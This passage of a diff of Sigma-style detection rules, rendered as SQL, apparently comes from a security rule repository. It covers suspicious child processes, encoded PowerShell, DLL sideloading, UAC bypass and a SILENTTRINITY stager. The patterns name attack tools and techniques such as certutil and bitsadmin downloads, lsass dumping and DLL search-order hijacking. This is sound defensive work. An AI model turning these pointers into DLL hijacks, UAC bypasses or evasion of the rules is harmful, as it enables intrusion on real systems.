LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE 